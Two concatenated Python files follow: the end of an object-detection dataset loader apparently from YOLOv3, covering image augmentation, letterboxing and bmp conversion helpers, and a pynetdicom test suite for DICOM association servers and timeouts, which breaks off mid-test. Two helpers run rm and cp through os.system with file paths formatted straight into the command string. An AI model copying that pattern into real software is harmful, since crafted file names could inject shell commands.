self.img_hw0, self.img_hw = [None] * n, [None] * n
for i in pbar: # max 10k images
self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(
self, i
) # img, hw_original, hw_resized
gb += self.imgs[i].nbytes
pbar.desc = "Caching images (%.1fGB)" % (gb / 1e9)
# Detect corrupted images https://medium.com/joelthchao/programmatically-detect-corrupted-image-8c1b2006c3d3
detect_corrupted_images = False
if detect_corrupted_images:
from skimage import io # conda install -c conda-forge scikit-image
for file in tqdm(self.img_files, desc="Detecting corrupted images"):
try:
_ = io.imread(file)
except Exception:
print("Corrupted image detected: %s" % file)
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
img_path = self.img_files[index]
label_path = self.label_files[index]
hyp = self.hyp
if self.mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = (
self.batch_shapes[self.batch[index]] if self.rect else self.img_size
) # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
if os.path.isfile(label_path):
x = self.labels[index]
if x is None: # labels not preloaded
with open(label_path, "r") as f:
x = np.array(
[x.split() for x in f.read().splitlines()], dtype=np.float32
)
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = (
ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0]
) # pad width
labels[:, 2] = (
ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1]
) # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not self.mosaic:
img, labels = random_affine(
img,
labels,
degrees=hyp["degrees"],
translate=hyp["translate"],
scale=hyp["scale"],
shear=hyp["shear"],
)
# Augment colorspace
augment_hsv(img, hgain=hyp["hsv_h"], sgain=hyp["hsv_s"], vgain=hyp["hsv_v"])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
# convert xyxy to xywh
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])
# Normalize coordinates 0 - 1
labels[:, [2, 4]] /= img.shape[0] # height
labels[:, [1, 3]] /= img.shape[1] # width
if self.augment:
# random left-right flip
lr_flip = True
if lr_flip and random.random() < 0.5:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
# random up-down flip
ud_flip = False
if ud_flip and random.random() < 0.5:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, img_path, shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
img_path = self.img_files[index]
img = cv2.imread(img_path) # BGR
assert img is not None, "Image Not Found " + img_path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r < 1 or (
self.augment and (r != 1)
): # always resize down, only resize up if training with augmentation
interp = (
cv2.INTER_LINEAR if self.augment else cv2.INTER_AREA
) # LINEAR for training, AREA for testing
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return (
self.imgs[index],
self.img_hw0[index],
self.img_hw[index],
) # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
x = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
img_hsv = (
(cv2.cvtColor(img, cv2.COLOR_BGR2HSV) * x).clip(None, 255).astype(np.uint8)
)
np.clip(
img_hsv[:, :, 0], None, 179, out=img_hsv[:, :, 0]
) # inplace hue clip (0 - 179 deg)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
xc, yc = [
int(random.uniform(s * 0.5, s * 1.5)) for _ in range(2)
] # mosaic center x, y
img4 = np.zeros((s * 2, s * 2, 3), dtype=np.uint8) + 128 # base image with 4 tiles
indices = [index] + [
random.randint(0, len(self.labels) - 1) for _ in range(3)
] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
x1a, y1a, x2a, y2a = (
max(xc - w, 0),
max(yc - h, 0),
xc,
yc,
) # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = (
w - (x2a - x1a),
h - (y2a - y1a),
w,
h,
) # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, max(xc, w), min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Load labels
label_path = self.label_files[index]
if os.path.isfile(label_path):
x = self.labels[index]
if x is None: # labels not preloaded
with open(label_path, "r") as f:
x = np.array(
[x.split() for x in f.read().splitlines()], dtype=np.float32
)
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
else:
labels = np.zeros((0, 5), dtype=np.float32)
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
# np.clip(labels4[:, 1:] - s / 2, 0, s, out=labels4[:, 1:]) # use with center crop
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_affine
# Augment
# img4 = img4[s // 2: int(s * 1.5), s // 2:int(s * 1.5)] # center crop (WARNING, requires box pruning)
img4, labels4 = random_affine(
img4,
labels4,
degrees=self.hyp["degrees"] * 1,
translate=self.hyp["translate"] * 1,
scale=self.hyp["scale"] * 1,
shear=self.hyp["shear"] * 1,
border=-s // 2,
) # border to remove
return img4, labels4
def letterbox(
img,
new_shape=(416, 416),
color=(128, 128, 128),
auto=True,
scaleFill=False,
scaleup=True,
interp=cv2.INTER_AREA,
):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = max(new_shape) / max(shape)
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 32), np.mod(dh, 32) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = new_shape
ratio = new_shape[0] / shape[1], new_shape[1] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(
img, new_unpad, interpolation=interp
) # INTER_AREA is better, INTER_LINEAR is faster
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(
img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color
) # add border
return img, ratio, (dw, dh)
def random_affine(
img, targets=(), degrees=10, translate=0.1, scale=0.1, shear=10, border=0
):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# https://medium.com/uruvideo/dataset-augmentation-with-random-homographies-a8f4b44830d4
if targets is None: # targets = [cls, xyxy]
targets = []
height = img.shape[0] + border * 2
width = img.shape[1] + border * 2
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
R[:2] = cv2.getRotationMatrix2D(
angle=a, center=(img.shape[1] / 2, img.shape[0] / 2), scale=s
)
# Translation
T = np.eye(3)
T[0, 2] = (
random.uniform(-translate, translate) * img.shape[0] + border
) # x translation (pixels)
T[1, 2] = (
random.uniform(-translate, translate) * img.shape[1] + border
) # y translation (pixels)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Combined rotation matrix
M = S @ T @ R # ORDER IS IMPORTANT HERE!!
changed = (border != 0) or (M != np.eye(3)).any()
if changed:
img = cv2.warpAffine(
img,
M[:2],
dsize=(width, height),
flags=cv2.INTER_AREA,
borderValue=(128, 128, 128),
)
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(
n * 4, 2
) # x1y1, x2y2, x1y2, x2y1
xy = (xy @ M.T)[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# reject warped points outside of image
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
w = xy[:, 2] - xy[:, 0]
h = xy[:, 3] - xy[:, 1]
area = w * h
area0 = (targets[:, 3] - targets[:, 1]) * (targets[:, 4] - targets[:, 2])
ar = np.maximum(w / (h + 1e-16), h / (w + 1e-16)) # aspect ratio
i = (w > 4) & (h > 4) & (area / (area0 + 1e-16) > 0.2) & (ar < 10)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def cutout(image, labels):
# https://arxiv.org/abs/1708.04552
# https://github.com/hysts/pytorch_cutout/blob/master/dataloader.py
# https://towardsdatascience.com/when-conventional-wisdom-fails-revisiting-data-augmentation-for-self-driving-cars-4831998c5509
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * (
np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)
).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = (
[0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16
) # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def reduce_img_size(
path="../data/sm4/images", img_size=1024
): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + "_reduced" # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob("%s/*.*" % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(
img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA
) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
except Exception:
print("WARNING: image failure %s" % f)
def convert_images2bmp(): # from utils.datasets import *; convert_images2bmp()
# Save images
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
# for path in ['../coco/images/val2014', '../coco/images/train2014']:
for path in ["../data/sm4/images", "../data/sm4/background"]:
create_folder(path + "bmp")
for ext in formats: # ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
for f in tqdm(
glob.glob("%s/*%s" % (path, ext)), desc="Converting %s" % ext
):
cv2.imwrite(
f.replace(ext.lower(), ".bmp").replace(path, path + "bmp"),
cv2.imread(f),
)
# Save labels
# for path in ['../coco/trainvalno5k.txt', '../coco/5k.txt']:
for file in ["../data/sm4/out_train.txt", "../data/sm4/out_test.txt"]:
with open(file, "r") as f:
lines = f.read()
# lines = f.read().replace('2014/', '2014bmp/') # coco
lines = lines.replace("/images", "/imagesbmp")
lines = lines.replace("/background", "/backgroundbmp")
for ext in formats:
lines = lines.replace(ext, ".bmp")
with open(file.replace(".txt", "bmp.txt"), "w") as f:
f.write(lines)
def recursive_dataset2bmp(
dataset="../data/sm4_bmp",
): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + "/" + file
s = Path(file).suffix
if s == ".txt": # replace text
with open(p, "r") as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, ".bmp")
with open(p, "w") as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, ".bmp"), cv2.imread(p))
if s != ".bmp":
os.system("rm '%s'" % p)
def imagelist2folder(
path="data/coco_64img.txt",
): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, "r") as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path="./new_folder"):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
|
test_ae.py
|
"""Tests for the ae module."""
import logging
import os
import signal
import threading
import time
import pytest
from pydicom import read_file, config as PYD_CONFIG
from pydicom.dataset import Dataset
from pydicom.uid import UID, ImplicitVRLittleEndian
from pynetdicom import (
AE,
build_context,
_config,
debug_logger,
DEFAULT_TRANSFER_SYNTAXES,
evt,
PYNETDICOM_IMPLEMENTATION_UID,
PYNETDICOM_IMPLEMENTATION_VERSION,
StoragePresentationContexts,
VerificationPresentationContexts,
)
from pynetdicom.presentation import build_context
from pynetdicom.sop_class import RTImageStorage, Verification
from pynetdicom.transport import AssociationServer, RequestHandler
if hasattr(PYD_CONFIG, "settings"):
PYD_CONFIG.settings.reading_validation_mode = 0
# debug_logger()
TEST_DS_DIR = os.path.join(os.path.dirname(__file__), "dicom_files")
DATASET = read_file(os.path.join(TEST_DS_DIR, "RTImageStorage.dcm"))
COMP_DATASET = read_file(
os.path.join(TEST_DS_DIR, "MRImageStorage_JPG2000_Lossless.dcm")
)
def test_blocking_handler():
"""Test binding events to the blocking AssociationServer."""
ae = AE()
ae.add_supported_context("1.2.840.10008.1.1")
def handle_echo(event):
return 0x0000
handlers = [(evt.EVT_C_ECHO, handle_echo)]
thread = threading.Thread(
target=ae.start_server,
args=(("localhost", 11112),),
kwargs={"evt_handlers": handlers},
)
thread.daemon = True
thread.start()
time.sleep(0.1)
ae.shutdown()
class TestMakeServer:
"""Tests for AE.make_server()"""
def setup(self):
"""Run prior to each test"""
self.ae = None
def teardown(self):
"""Clear any active threads"""
if self.ae:
self.ae.shutdown()
def test_default_arguments(self):
self.ae = ae = AE()
ae.add_supported_context(Verification)
server = ae.make_server(("localhost", 11112))
assert isinstance(server, AssociationServer)
def test_custom_request_handler(self):
class MyRequestHandler(RequestHandler):
pass
self.ae = ae = AE()
ae.add_supported_context(Verification)
server = ae.make_server(("localhost", 11112), request_handler=MyRequestHandler)
assert server.RequestHandlerClass is MyRequestHandler
def test_aet_bytes_deprecation(self):
"""Test warning if using bytes to set an AE title."""
self.ae = ae = AE()
ae.add_supported_context(Verification)
msg = (
r"The use of bytes with 'ae_title' is deprecated, use an ASCII "
r"str instead"
)
with pytest.warns(DeprecationWarning, match=msg):
server = ae.start_server(
("localhost", 11112), block=False, ae_title=b"BADAE2"
)
assert server.ae_title == "BADAE2"
server.shutdown()
class TestStartServer:
"""Tests for AE.start_server()"""
def setup(self):
"""Run prior to each test"""
self.ae = None
def teardown(self):
"""Clear any active threads"""
if self.ae:
self.ae.shutdown()
def test_ae_title(self):
"""Test the `ae_title` keyword parameter."""
self.ae = ae = AE()
ae.acse_timeout = 5
ae.dimse_timeout = 5
ae.network_timeout = 5
ae.ae_title = "TESTAET"
assert ae.ae_title == "TESTAET"
ae.add_supported_context(Verification)
server = ae.start_server(("localhost", 11112), block=False)
assert server.ae_title == ae.ae_title
server.shutdown()
server = ae.start_server(("localhost", 11112), block=False, ae_title="MYAE")
assert server.ae_title == "MYAE"
ae.require_called_aet = True
ae.add_requested_context(Verification)
assoc = ae.associate("localhost", 11112, ae_title="MYAE")
assert assoc.is_established
assoc.release()
assert assoc.is_released
server.shutdown()
def test_contexts(self):
"""Test the `contexts` keyword parameter."""
self.ae = ae = AE()
ae.acse_timeout = 5
ae.dimse_timeout = 5
ae.network_timeout = 5
ae.ae_title = "TESTAET"
assert ae.ae_title == "TESTAET"
cx = build_context(Verification)
server = ae.start_server(("localhost", 11112), block=False, contexts=[cx])
ae.add_requested_context(Verification)
assoc = ae.associate("localhost", 11112, ae_title="MYAE")
assert assoc.is_established
assert assoc.accepted_contexts[0].abstract_syntax == Verification
assoc.release()
assert assoc.is_released
server.shutdown()
class TestAEVerificationSCP:
"""Check verification SCP"""
def setup(self):
"""Run prior to each test"""
self.ae = None
def teardown(self):
"""Clear any active threads"""
if self.ae:
self.ae.shutdown()
@pytest.mark.skipif(os.name == "nt", reason="Kills pytest on windows")
def test_start_server_keyboard_interrupt(self):
"""Test stopping the SCP with keyboard"""
pid = os.getpid()
def trigger_signal():
time.sleep(0.1)
os.kill(pid, signal.SIGINT)
self.ae = ae = AE()
ae.add_supported_context("1.2.3")
thread = threading.Thread(target=trigger_signal)
thread.daemon = True
thread.start()
ae.start_server(("localhost", 11112))
ae.shutdown()
def test_no_supported_contexts(self):
"""Test starting with no contexts raises"""
self.ae = ae = AE()
ae.acse_timeout = 5
ae.dimse_timeout = 5
ae.network_timeout = 5
with pytest.raises(ValueError, match=r"No supported Presentation"):
ae.start_server(("localhost", 11112))
def test_new_scu_scp_warning(self):
"""Test that a warning is given if scu_role and scp_role bad."""
ae = AE()
ae.add_supported_context("1.2.3.4", scp_role=False)
msg = r"The following presentation contexts have "
with pytest.raises(ValueError, match=msg):
ae.start_server(("localhost", 11112))
def test_str_empty(self):
"""Test str output for default AE"""
ae = AE()
ae.__str__()
class TestAEPresentationSCU:
"""Tests for AE presentation contexts when running as an SCU"""
def setup(self):
"""Run prior to each test"""
self.ae = None
def teardown(self):
"""Clear any active threads"""
if self.ae:
self.ae.shutdown()
def test_associate_context(self):
"""Test that AE.associate doesn't modify the supplied contexts"""
# Test AE.requested_contexts
self.ae = ae = AE()
ae.add_supported_context(Verification)
scp = ae.start_server(("localhost", 11112), block=False)
ae.requested_contexts = VerificationPresentationContexts
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assert ae.requested_contexts[0].context_id is None
assert len(assoc.requestor.requested_contexts) == 1
assert assoc.requestor.requested_contexts[0].abstract_syntax == (
"1.2.840.10008.1.1"
)
assert assoc.requestor.requested_contexts[0].context_id == 1
assoc.release()
assert not assoc.is_established
assert assoc.is_released
# Test associate(contexts=...)
ae.requested_contexts = []
assoc = ae.associate(
"localhost", 11112, contexts=VerificationPresentationContexts
)
assert assoc.is_established
assert VerificationPresentationContexts[0].context_id is None
assert len(assoc.requestor.requested_contexts) == 1
assert assoc.requestor.requested_contexts[0].abstract_syntax == (
"1.2.840.10008.1.1"
)
assert assoc.requestor.requested_contexts[0].context_id == 1
assoc.release()
assert not assoc.is_established
assert assoc.is_released
scp.shutdown()
def test_associate_context_raises(self):
"""Test that AE.associate raises exception if no requested contexts"""
self.ae = ae = AE()
with pytest.raises(RuntimeError):
assoc = ae.associate("localhost", 11112)
class TestAEGoodTimeoutSetters:
def test_acse_timeout(self):
"""Check AE ACSE timeout change produces good value"""
ae = AE()
assert ae.acse_timeout == 30
ae.acse_timeout = None
assert ae.acse_timeout is None
ae.acse_timeout = -100
assert ae.acse_timeout == 30
ae.acse_timeout = "a"
assert ae.acse_timeout == 30
ae.acse_timeout = 0
assert ae.acse_timeout == 0
ae.acse_timeout = 30
assert ae.acse_timeout == 30
def test_dimse_timeout(self):
"""Check AE DIMSE timeout change produces good value"""
ae = AE()
assert ae.dimse_timeout == 30
ae.dimse_timeout = None
assert ae.dimse_timeout is None
ae.dimse_timeout = -100
assert ae.dimse_timeout == 30
ae.dimse_timeout = "a"
assert ae.dimse_timeout == 30
ae.dimse_timeout = 0
assert ae.dimse_timeout == 0
ae.dimse_timeout = 30
assert ae.dimse_timeout == 30
def test_network_timeout(self):
"""Check AE network timeout change produces good value"""
ae = AE()
assert ae.network_timeout == 60
ae.network_timeout = None
assert ae.network_timeout is None
ae.network_timeout = -100
assert ae.network_timeout == 60
ae.network_timeout = "a"
assert ae.network_timeout == 60
ae.network_timeout = 0
assert ae.network_timeout == 0
ae.network_timeout = 30
assert ae.network_timeout == 30
def test_connection_timeout(self):
"""Check AE connection timeout change produces good value"""
ae = AE()
assert ae.connection_timeout is None
ae.connection_timeout = None
assert ae.connection_timeout is None
ae.connection_timeout = -100
assert ae.connection_timeout is None
ae.connection_timeout = "a"
assert ae.connection_timeout is None
ae.connection_timeout = 0
assert ae.connection_timeout is None
ae.connection_timeout = 30
assert ae.connection_timeout == 30
def test_active_acse(self):
"""Test changing acse_timeout with active associations."""
ae = AE()
ae.add_supported_context("1.2.840.10008.1.1")
scp = ae.start_server(("localhost", 11112), block=False)
ae.add_requested_context("1.2.840.10008.1.1")
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assert assoc.acse_timeout == 30
ae.acse_timeout = 5
assert assoc.acse_timeout == 5
assoc.release()
scp.shutdown()
ae.shutdown()
def test_active_dimse(self):
"""Test changing dimse_timeout with active associations."""
ae = AE()
ae.add_supported_context("1.2.840.10008.1.1")
scp = ae.start_server(("localhost", 11112), block=False)
ae.add_requested_context("1.2.840.10008.1.1")
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assert assoc.dimse_timeout == 30
ae.dimse_timeout = 5
assert assoc.dimse_timeout == 5
assoc.release()
scp.shutdown()
def test_active_network(self):
"""Test changing network_timeout with active associations."""
ae = AE()
ae.add_supported_context("1.2.840.10008.1.1")
scp = ae.start_server(("localhost", 11112), block=False)
ae.add_requested_context("1.2.840.10008.1.1")
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assert assoc.network_timeout == 60
ae.network_timeout = 5
assert assoc.network_timeout == 5
assoc.release()
scp.shutdown()
def test_active_connection(self):
"""Test changing connection_timeout with active associations."""
ae = AE()
ae.add_supported_context("1.2.840.10008.1.1")
scp = ae.start_server(("localhost", 11112), block=False)
ae.add_requested_context("1.2.840.10008.1.1")
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assert assoc.connection_timeout is None
ae.connection_timeout = 5
assert assoc.connection_timeout == 5
assoc.release()
scp.shutdown()
class TestAEGoodAssociation:
def setup(self):
"""Run prior to each test"""
self.ae = None
def teardown(self):
"""Clear any active threads"""
if self.ae:
self.ae.shutdown()
def test_associate_establish_release(self):
"""Check SCU Association with SCP"""
self.ae = ae = AE()
ae.acse_timeout = 5
ae.dimse_timeout = 5
ae.network_timeout = 5
ae.add_supported_context(Verification)
scp = ae.start_server(("localhost", 11112), block=False)
ae.add_requested_context(Verification)
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assoc.release()
assert not assoc.is_established
assert assoc.is_released
scp.shutdown()
def test_associate_max_pdu(self):
"""Check Association has correct max PDUs on either end"""
self.ae = ae = AE()
ae.acse_timeout = 5
ae.dimse_timeout = 5
ae.network_timeout = 5
ae.maximum_pdu_size = 54321
ae.add_supported_context(Verification)
scp = ae.start_server(("localhost", 11112), block=False)
scu_ae = AE()
scu_ae.acse_timeout = 5
scu_ae.dimse_timeout = 5
scu_ae.network_timeout = 5
scu_ae.add_requested_context(Verification)
assoc = scu_ae.associate("localhost", 11112, max_pdu=12345)
assert assoc.is_established
assert scp.active_associations[0].acceptor.maximum_length == (54321)
assert scp.active_associations[0].requestor.maximum_length == (12345)
assert assoc.requestor.maximum_length == 12345
assert assoc.acceptor.maximum_length == 54321
assoc.release()
time.sleep(0.1)
assert scp.active_associations == []
# Check 0 max pdu value - max PDU value maps to 0x10000 internally
assoc = scu_ae.associate("localhost", 11112, max_pdu=0)
assert assoc.requestor.maximum_length == 0
assert scp.active_associations[0].requestor.maximum_length == 0
assoc.release()
scp.shutdown()
def test_association_timeouts(self):
"""Check that the Association timeouts are being set correctly and
work"""
acse_delay = None
dimse_delay = None
def handle_echo(event):
if dimse_delay:
time.sleep(dimse_delay)
return 0x0000
def handle_acse_recv(event):
if acse_delay:
time.sleep(acse_delay)
self.ae = ae = AE()
ae.acse_timeout = 5
ae.dimse_timeout = 5
ae.network_timeout = 0.5
ae.add_supported_context(Verification)
scp = ae.start_server(
("localhost", 11112),
block=False,
evt_handlers=[
(evt.EVT_ACSE_RECV, handle_acse_recv),
(evt.EVT_C_ECHO, handle_echo),
],
)
scu_ae = AE()
scu_ae.acse_timeout = 30
scu_ae.dimse_timeout = 30
scu_ae.network_timeout = 30
scu_ae.add_requested_context(Verification)
assoc = scu_ae.associate("localhost", 11112)
assert assoc.is_established
# Hit the network timeout
time.sleep(1.0)
assert assoc.is_aborted
assert len(scp.active_associations) == 0
ae.acse_timeout = None
ae.dimse_timeout = None
ae.network_timeout = None
scu_ae.acse_timeout = 30
scu_ae.dimse_timeout = 0
dimse_delay = 1
assoc = scu_ae.associate("localhost", 11112)
assert assoc.is_established
status = assoc.send_c_echo()
time.sleep(1.5)
assert assoc.is_aborted
assert len(scp.active_associations) == 0
# FIXME: If this is `0` we can process an ABORT primitive where
# we expect an ASSOCIATION primitive.
scu_ae.acse_timeout = 0.5
scu_ae.dimse_timeout = 30
acse_delay = 1
assoc = scu_ae.associate("localhost", 11112)
assert not assoc.is_established
assert assoc.is_aborted
time.sleep(1.5)
assert len(scp.active_associations) == 0
scu_ae.acse_timeout = 30
# `0` is an invalid value
scu_ae.connection_timeout = 0.5
scu_ae.dimse_timeout = 30
# The host exists and is routable, but there is a middlebox ignoring
# the initial TCP SYN.
assoc = scu_ae.associate("example.com", 11112)
assert not assoc.is_established
assert assoc.is_aborted
assert len(scp.active_associations) == 0
ae.acse_timeout = 21
ae.dimse_timeout = 22
scu_ae.acse_timeout = 31
scu_ae.connection_timeout = None
scu_ae.dimse_timeout = 32
assoc = scu_ae.associate("localhost", 11112)
assert assoc.is_established
assert scp.active_associations[0].acse_timeout == 21
assert scp.active_associations[0].dimse_timeout == 22
assert assoc.acse_timeout == 31
assert assoc.dimse_timeout == 32
assoc.release()
scp.shutdown()
def test_connection_timeout(self, caplog):
# * ACSE timeout does not start until connection timeout completes
# * Logs indicate that we hit the timeout case
scu_ae = AE()
scu_ae.acse_timeout = 0.5
scu_ae.connection_timeout = 1
scu_ae.add_requested_context(Verification)
with caplog.at_level(logging.ERROR, logger="pynetdicom"):
assoc = scu_ae.associate(
"8.8.8.8",
11112,
bind_address=("", 0),
)
assert not assoc.is_established
assert assoc.is_aborted
msgs = [
"TCP Initialisation Error: timed out",
"TCP Initialisation Error: [Errno -2] Name or service not known",
